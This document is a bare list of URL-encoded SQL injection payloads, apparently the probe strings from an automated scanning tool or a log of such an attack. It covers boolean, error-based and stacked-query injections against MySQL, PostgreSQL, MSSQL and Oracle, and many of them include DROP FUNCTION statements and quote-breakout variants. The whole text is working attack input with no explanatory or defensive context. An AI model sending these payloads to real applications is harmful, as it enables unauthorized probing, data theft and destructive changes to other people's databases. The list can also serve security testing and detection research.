%28SELECT%20%28CASE%20WHEN%20%282643%3D8166%29%20THEN%201%20ELSE%202643%2A%28SELECT%202643%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20GENERATE_SERIES%281%2C1%2CCASE%20WHEN%20%281938%3D1756%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%281%2C1%2CCASE%20WHEN%20%285558%3D5558%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%281%2C1%2CCASE%20WHEN%20%288690%3D5151%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20%28CASE%20WHEN%20%286055%3D1205%29%20THEN%201%20ELSE%206055%2A%28SELECT%206055%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286384%3D6384%29%20THEN%201%20ELSE%206384%2A%28SELECT%206384%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284129%3D5847%29%20THEN%201%20ELSE%204129%2A%28SELECT%204129%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281308%3D9621%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%284152%3D4152%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%281403%3D5062%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 IIF%283576%3D5141%2C1%2C1%2F0%29 IIF%284986%3D4986%2C1%2C1%2F0%29 IIF%284239%3D4791%2C1%2C1%2F0%29 %28CASE%20WHEN%205177%3D6886%20THEN%201%20ELSE%20NULL%20END%29 %28CASE%20WHEN%209886%3D9886%20THEN%201%20ELSE%20NULL%20END%29 %28CASE%20WHEN%204518%3D5617%20THEN%201%20ELSE%20NULL%20END%29 1%2C%28SELECT%20%28CASE%20WHEN%20%288564%3D6696%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%286500%3D6500%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%286328%3D6363%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%286068%3D1493%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%288122%3D8122%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%283566%3D6790%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%282704%3D8209%29%20THEN%201%20ELSE%202704%2A%28SELECT%202704%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%287713%3D7713%29%20THEN%201%20ELSE%207713%2A%28SELECT%207713%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%282124%3D3118%29%20THEN%201%20ELSE%202124%2A%28SELECT%202124%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%282193%3D7400%29%20THEN%201%20ELSE%202193%2A%28SELECT%202193%20FROM%20mysql.db%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%289211%3D9211%29%20THEN%201%20ELSE%209211%2A%28SELECT%209211%20FROM%20mysql.db%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%283977%3D4526%29%20THEN%201%20ELSE%203977%2A%28SELECT%203977%20FROM%20mysql.db%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%284326%3D7972%29%20THEN%201%20ELSE%204326%2A%28SELECT%204326%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%284097%3D4097%29%20THEN%201%20ELSE%204097%2A%28SELECT%204097%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%281845%3D5336%29%20THEN%201%20ELSE%201845%2A%28SELECT%201845%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%284715%3D4384%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%2C%28SELECT%20%28CASE%20WHEN%20%287302%3D7302%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%2C%28SELECT%20%28CASE%20WHEN%20%286916%3D6036%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%2CIIF%287144%3D8477%2C1%2C1%2F0%29 1%2CIIF%281004%3D1004%2C1%2C1%2F0%29 1%2CIIF%283464%3D3443%2C1%2C1%2F0%29 1%29%3B%20IF%28%282406%3D7520%29%2CSELECT%202406%2CDROP%20FUNCTION%20mJdU%29%3B%23 1%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%29%3B%20IF%28%284295%3D4835%29%2CSELECT%204295%2CDROP%20FUNCTION%20JCdi%29%3B%23 1%27%29%3B%20IF%28%284305%3D7550%29%2CSELECT%204305%2CDROP%20FUNCTION%20djjg%29%3B%23 1%27%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%27%29%3B%20IF%28%288191%3D9258%29%2CSELECT%208191%2CDROP%20FUNCTION%20Pwyx%29%3B%23 1%27%3B%20IF%28%283037%3D5360%29%2CSELECT%203037%2CDROP%20FUNCTION%20buno%29%3B%23 1%27%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%27%3B%20IF%28%287289%3D4377%29%2CSELECT%207289%2CDROP%20FUNCTION%20KcbX%29%3B%23 1%22%3B%20IF%28%281884%3D6064%29%2CSELECT%201884%2CDROP%20FUNCTION%20ZoDi%29%3B%23 1%22%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%22%3B%20IF%28%284558%3D2077%29%2CSELECT%204558%2CDROP%20FUNCTION%20wrdu%29%3B%23 1%29%3B%20IF%28%289331%3D9388%29%2CSELECT%209331%2CDROP%20FUNCTION%20lEWW%29%3B%23%20AND%20%285039%3D5039 1%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%286470%3D6470 1%29%3B%20IF%28%285434%3D2739%29%2CSELECT%205434%2CDROP%20FUNCTION%20asWe%29%3B%23%20AND%20%281947%3D1947 1%29%29%3B%20IF%28%282491%3D2690%29%2CSELECT%202491%2CDROP%20FUNCTION%20TbCc%29%3B%23%20AND%20%28%286234%3D6234 1%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%283061%3D3061 1%29%29%3B%20IF%28%286280%3D7010%29%2CSELECT%206280%2CDROP%20FUNCTION%20XRES%29%3B%23%20AND%20%28%285039%3D5039 1%29%29%29%3B%20IF%28%289395%3D7507%29%2CSELECT%209395%2CDROP%20FUNCTION%20BHNu%29%3B%23%20AND%20%28%28%281764%3D1764 1%29%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%289717%3D9717 1%29%29%29%3B%20IF%28%288160%3D4841%29%2CSELECT%208160%2CDROP%20FUNCTION%20GzgS%29%3B%23%20AND%20%28%28%283371%3D3371 1%3B%20IF%28%288291%3D6639%29%2CSELECT%208291%2CDROP%20FUNCTION%20yGMg%29%3B%23 1%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%3B%20IF%28%283638%3D2654%29%2CSELECT%203638%2CDROP%20FUNCTION%20sKDd%29%3B%23 1%27%29%3B%20IF%28%285414%3D8721%29%2CSELECT%205414%2CDROP%20FUNCTION%20ZPKi%29%3B%23%20AND%20%28%27uyyE%27%3D%27uyyE 1%27%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%27Zsex%27%3D%27Zsex 1%27%29%3B%20IF%28%284403%3D5407%29%2CSELECT%204403%2CDROP%20FUNCTION%20Igjt%29%3B%23%20AND%20%28%27pZGN%27%3D%27pZGN 1%27%29%29%3B%20IF%28%281666%3D1509%29%2CSELECT%201666%2CDROP%20FUNCTION%20JfSL%29%3B%23%20AND%20%28%28%27sYYh%27%3D%27sYYh 1%27%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%27UWKf%27%3D%27UWKf 1%27%29%29%3B%20IF%28%282802%3D6567%29%2CSELECT%202802%2CDROP%20FUNCTION%20gWXD%29%3B%23%20AND%20%28%28%27vzkw%27%3D%27vzkw 1%27%29%29%29%3B%20IF%28%288091%3D7538%29%2CSELECT%208091%2CDROP%20FUNCTION%20IoRA%29%3B%23%20AND%20%28%28%28%27vYGe%27%3D%27vYGe 1%27%29%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%28%27dcBI%27%3D%27dcBI 1%27%29%29%29%3B%20IF%28%284820%3D2467%29%2CSELECT%204820%2CDROP%20FUNCTION%20PTxF%29%3B%23%20AND%20%28%28%28%27rSZf%27%3D%27rSZf 1%27%3B%20IF%28%286921%3D9372%29%2CSELECT%206921%2CDROP%20FUNCTION%20ETJA%29%3B%23%20AND%20%27ICUL%27%3D%27ICUL 1%27%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%27qVfl%27%3D%27qVfl 1%27%3B%20IF%28%283883%3D6479%29%2CSELECT%203883%2CDROP%20FUNCTION%20ZJpJ%29%3B%23%20AND%20%27RVao%27%3D%27RVao 1%27%29%3B%20IF%28%287562%3D1836%29%2CSELECT%207562%2CDROP%20FUNCTION%20VcSF%29%3B%23%20AND%20%28%27uoNW%27%20LIKE%20%27uoNW 1%27%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%27lDeJ%27%20LIKE%20%27lDeJ 1%27%29%3B%20IF%28%288048%3D7053%29%2CSELECT%208048%2CDROP%20FUNCTION%20eWyL%29%3B%23%20AND%20%28%27RSmd%27%20LIKE%20%27RSmd 1%27%29%29%3B%20IF%28%283320%3D4736%29%2CSELECT%203320%2CDROP%20FUNCTION%20ydkc%29%3B%23%20AND%20%28%28%27ULnR%27%20LIKE%20%27ULnR 1%27%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%27yIbk%27%20LIKE%20%27yIbk 1%27%29%29%3B%20IF%28%288798%3D5566%29%2CSELECT%208798%2CDROP%20FUNCTION%20sHgP%29%3B%23%20AND%20%28%28%27OyYX%27%20LIKE%20%27OyYX 1%27%29%29%29%3B%20IF%28%289297%3D6239%29%2CSELECT%209297%2CDROP%20FUNCTION%20zbDZ%29%3B%23%20AND%20%28%28%28%27cDeF%27%20LIKE%20%27cDeF 1%27%29%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%28%27fWcX%27%20LIKE%20%27fWcX 1%27%29%29%29%3B%20IF%28%284241%3D6312%29%2CSELECT%204241%2CDROP%20FUNCTION%20EssS%29%3B%23%20AND%20%28%28%28%27hEpi%27%20LIKE%20%27hEpi 1%27%3B%20IF%28%283906%3D8550%29%2CSELECT%203906%2CDROP%20FUNCTION%20vguN%29%3B%23%20AND%20%27FCRW%27%20LIKE%20%27FCRW 1%27%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%27hBNe%27%20LIKE%20%27hBNe 1%27%3B%20IF%28%286952%3D9992%29%2CSELECT%206952%2CDROP%20FUNCTION%20qamM%29%3B%23%20AND%20%27dClE%27%20LIKE%20%27dClE 1%22%29%3B%20IF%28%284898%3D9329%29%2CSELECT%204898%2CDROP%20FUNCTION%20qXjr%29%3B%23%20AND%20%28%22sOIT%22%3D%22sOIT 1%22%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%22lnfM%22%3D%22lnfM 1%22%29%3B%20IF%28%287707%3D8766%29%2CSELECT%207707%2CDROP%20FUNCTION%20zzwT%29%3B%23%20AND%20%28%22AbmD%22%3D%22AbmD 1%22%29%29%3B%20IF%28%288011%3D3280%29%2CSELECT%208011%2CDROP%20FUNCTION%20XqsT%29%3B%23%20AND%20%28%28%22iwdg%22%3D%22iwdg 1%22%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%22JcHR%22%3D%22JcHR 1%22%29%29%3B%20IF%28%285048%3D1758%29%2CSELECT%205048%2CDROP%20FUNCTION%20uron%29%3B%23%20AND%20%28%28%22ZAQj%22%3D%22ZAQj 1%22%29%29%29%3B%20IF%28%288875%3D5710%29%2CSELECT%208875%2CDROP%20FUNCTION%20oyan%29%3B%23%20AND%20%28%28%28%22fIXL%22%3D%22fIXL 1%22%29%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%28%22bamX%22%3D%22bamX 1%22%29%29%29%3B%20IF%28%281137%3D1665%29%2CSELECT%201137%2CDROP%20FUNCTION%20fKWn%29%3B%23%20AND%20%28%28%28%22drjz%22%3D%22drjz 1%22%3B%20IF%28%286709%3D6942%29%2CSELECT%206709%2CDROP%20FUNCTION%20xWKN%29%3B%23%20AND%20%22qmtQ%22%3D%22qmtQ 1%22%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%22aRas%22%3D%22aRas 1%22%3B%20IF%28%283986%3D4775%29%2CSELECT%203986%2CDROP%20FUNCTION%20QRlV%29%3B%23%20AND%20%22ubrC%22%3D%22ubrC 1%22%29%3B%20IF%28%289605%3D8577%29%2CSELECT%209605%2CDROP%20FUNCTION%20ebbn%29%3B%23%20AND%20%28%22evMU%22%20LIKE%20%22evMU 1%22%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%22xqzd%22%20LIKE%20%22xqzd 1%22%29%3B%20IF%28%287590%3D1361%29%2CSELECT%207590%2CDROP%20FUNCTION%20NITt%29%3B%23%20AND%20%28%22Yija%22%20LIKE%20%22Yija 1%22%29%29%3B%20IF%28%283775%3D4587%29%2CSELECT%203775%2CDROP%20FUNCTION%20jbuX%29%3B%23%20AND%20%28%28%22WdRE%22%20LIKE%20%22WdRE 1%22%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%22qxzD%22%20LIKE%20%22qxzD 1%22%29%29%3B%20IF%28%285307%3D4616%29%2CSELECT%205307%2CDROP%20FUNCTION%20YwaB%29%3B%23%20AND%20%28%28%22Zauy%22%20LIKE%20%22Zauy 1%22%29%29%29%3B%20IF%28%288502%3D1921%29%2CSELECT%208502%2CDROP%20FUNCTION%20nGiR%29%3B%23%20AND%20%28%28%28%22HCgH%22%20LIKE%20%22HCgH 1%22%29%29%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%28%28%28%22tWQC%22%20LIKE%20%22tWQC 1%22%29%29%29%3B%20IF%28%282252%3D8880%29%2CSELECT%202252%2CDROP%20FUNCTION%20Hgjm%29%3B%23%20AND%20%28%28%28%22FnFs%22%20LIKE%20%22FnFs 1%22%3B%20IF%28%287090%3D1440%29%2CSELECT%207090%2CDROP%20FUNCTION%20Ulej%29%3B%23%20AND%20%22ruaL%22%20LIKE%20%22ruaL 1%22%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20AND%20%22HDsx%22%20LIKE%20%22HDsx 1%22%3B%20IF%28%287568%3D4091%29%2CSELECT%207568%2CDROP%20FUNCTION%20RvrG%29%3B%23%20AND%20%22UaNa%22%20LIKE%20%22UaNa 1%29%20WHERE%204815%3D4815%3B%20IF%28%283045%3D9510%29%2CSELECT%203045%2CDROP%20FUNCTION%20uBPn%29%3B%23 1%29%20WHERE%209525%3D9525%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%29%20WHERE%209897%3D9897%3B%20IF%28%285673%3D6823%29%2CSELECT%205673%2CDROP%20FUNCTION%20ZruM%29%3B%23 1%27%29%20WHERE%205920%3D5920%3B%20IF%28%287665%3D9841%29%2CSELECT%207665%2CDROP%20FUNCTION%20osDo%29%3B%23 1%27%29%20WHERE%201032%3D1032%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%27%29%20WHERE%202303%3D2303%3B%20IF%28%288092%3D6191%29%2CSELECT%208092%2CDROP%20FUNCTION%20xCpB%29%3B%23 1%27%20WHERE%203135%3D3135%3B%20IF%28%282078%3D3053%29%2CSELECT%202078%2CDROP%20FUNCTION%20UMrv%29%3B%23 1%27%20WHERE%203946%3D3946%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%27%20WHERE%202598%3D2598%3B%20IF%28%284210%3D5732%29%2CSELECT%204210%2CDROP%20FUNCTION%20hYFK%29%3B%23 1%22%20WHERE%202928%3D2928%3B%20IF%28%286722%3D9675%29%2CSELECT%206722%2CDROP%20FUNCTION%20xnva%29%3B%23 1%22%20WHERE%209149%3D9149%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23 1%22%20WHERE%205121%3D5121%3B%20IF%28%282449%3D9120%29%2CSELECT%202449%2CDROP%20FUNCTION%20fscP%29%3B%23 1%27%20%7C%7C%20%28SELECT%204227%20FROM%20DUAL%20WHERE%207642%3D7642%3B%20IF%28%286045%3D6653%29%2CSELECT%206045%2CDROP%20FUNCTION%20FpTw%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208795%20FROM%20DUAL%20WHERE%208367%3D8367%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208983%20FROM%20DUAL%20WHERE%204621%3D4621%3B%20IF%28%287011%3D5797%29%2CSELECT%207011%2CDROP%20FUNCTION%20oRDF%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207646%20WHERE%201161%3D1161%3B%20IF%28%286480%3D9892%29%2CSELECT%206480%2CDROP%20FUNCTION%20YkGG%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208112%20WHERE%206921%3D6921%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209453%20WHERE%202726%3D2726%3B%20IF%28%282204%3D2275%29%2CSELECT%202204%2CDROP%20FUNCTION%20Nxte%29%3B%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%204982%20FROM%20DUAL%20WHERE%204419%3D4419%3B%20IF%28%286644%3D6922%29%2CSELECT%206644%2CDROP%20FUNCTION%20DfAV%29%3B%23%20%29 1%20%2B%20%28SELECT%203826%20FROM%20DUAL%20WHERE%207588%3D7588%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%29 1%20%2B%20%28SELECT%205662%20FROM%20DUAL%20WHERE%203864%3D3864%3B%20IF%28%287805%3D9512%29%2CSELECT%207805%2CDROP%20FUNCTION%20FRyw%29%3B%23%20%29 1%20%2B%20%28SELECT%209466%20WHERE%209423%3D9423%3B%20IF%28%282977%3D1111%29%2CSELECT%202977%2CDROP%20FUNCTION%20WYrW%29%3B%23%20%29 1%20%2B%20%28SELECT%201565%20WHERE%207654%3D7654%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%29 1%20%2B%20%28SELECT%201665%20WHERE%204959%3D4959%3B%20IF%28%289616%3D7375%29%2CSELECT%209616%2CDROP%20FUNCTION%20NyPF%29%3B%23%20%29 1%27%20%2B%20%28SELECT%20%27dBKd%27%20FROM%20DUAL%20WHERE%204462%3D4462%3B%20IF%28%287455%3D1786%29%2CSELECT%207455%2CDROP%20FUNCTION%20duDg%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27rmjN%27%20FROM%20DUAL%20WHERE%201168%3D1168%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ITou%27%20FROM%20DUAL%20WHERE%207989%3D7989%3B%20IF%28%282941%3D7742%29%2CSELECT%202941%2CDROP%20FUNCTION%20XNSx%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AVcr%27%20WHERE%201727%3D1727%3B%20IF%28%289798%3D2573%29%2CSELECT%209798%2CDROP%20FUNCTION%20xihQ%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MIHK%27%20WHERE%206663%3D6663%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RTfK%27%20WHERE%201868%3D1868%3B%20IF%28%284152%3D1311%29%2CSELECT%204152%2CDROP%20FUNCTION%20LNik%29%3B%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%283959%3D4121%29%2CSELECT%203959%2CDROP%20FUNCTION%20XzBx%29%3B%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%282495%3D2495%29%2CSELECT%202495%2CDROP%20FUNCTION%20GFRs%29%3B%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%281263%3D7510%29%2CSELECT%201263%2CDROP%20FUNCTION%20HKBY%29%3B%23%20%23 -6072%29%3B%20SELECT%20%28CASE%20WHEN%20%285364%3D9978%29%20THEN%205364%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -4583%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5067%29%3B%20SELECT%20%28CASE%20WHEN%20%285793%3D8076%29%20THEN%205793%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9278%27%29%3B%20SELECT%20%28CASE%20WHEN%20%288919%3D2400%29%20THEN%208919%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1563%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9537%27%29%3B%20SELECT%20%28CASE%20WHEN%20%285058%3D9021%29%20THEN%205058%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8048%27%3B%20SELECT%20%28CASE%20WHEN%20%287143%3D9820%29%20THEN%207143%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -7494%27%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8304%27%3B%20SELECT%20%28CASE%20WHEN%20%287875%3D2142%29%20THEN%207875%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9026%22%3B%20SELECT%20%28CASE%20WHEN%20%285294%3D7758%29%20THEN%205294%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6903%22%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2815%22%3B%20SELECT%20%28CASE%20WHEN%20%283565%3D9231%29%20THEN%203565%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5616%29%3B%20SELECT%20%28CASE%20WHEN%20%286789%3D6373%29%20THEN%206789%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%283595%3D3595 -1486%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%281797%3D1797 -8807%29%3B%20SELECT%20%28CASE%20WHEN%20%285210%3D3940%29%20THEN%205210%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%283173%3D3173 -7687%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283677%3D7457%29%20THEN%203677%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%284378%3D4378 -3464%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%282859%3D2859 -8499%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287702%3D8350%29%20THEN%207702%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%285057%3D5057 -9016%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283148%3D6314%29%20THEN%203148%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%281970%3D1970 -9113%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%282358%3D2358 -5378%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%289548%3D9764%29%20THEN%209548%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%284041%3D4041 -6623%3B%20SELECT%20%28CASE%20WHEN%20%281935%3D5360%29%20THEN%201935%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9723%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -7279%3B%20SELECT%20%28CASE%20WHEN%20%287264%3D6806%29%20THEN%207264%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8961%27%29%3B%20SELECT%20%28CASE%20WHEN%20%285124%3D7730%29%20THEN%205124%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27rfmJ%27%3D%27rfmJ -3016%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27eRwZ%27%3D%27eRwZ -3635%27%29%3B%20SELECT%20%28CASE%20WHEN%20%285496%3D6124%29%20THEN%205496%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27NnFk%27%3D%27NnFk -1915%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285608%3D4570%29%20THEN%205608%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27fsKI%27%3D%27fsKI -5543%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27vvCb%27%3D%27vvCb -7436%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282702%3D9672%29%20THEN%202702%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27SvOU%27%3D%27SvOU -9225%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283248%3D5789%29%20THEN%203248%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27QsbE%27%3D%27QsbE -8342%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27JKIg%27%3D%27JKIg -7259%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288070%3D5373%29%20THEN%208070%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27ZnnK%27%3D%27ZnnK -5219%27%3B%20SELECT%20%28CASE%20WHEN%20%286308%3D4550%29%20THEN%206308%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27TnlU%27%3D%27TnlU -2219%27%3B%20SELECT%20%28CASE%20WHEN%20%287398%3D7398%29%20THEN%207398%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27XSQj%27%3D%27XSQj 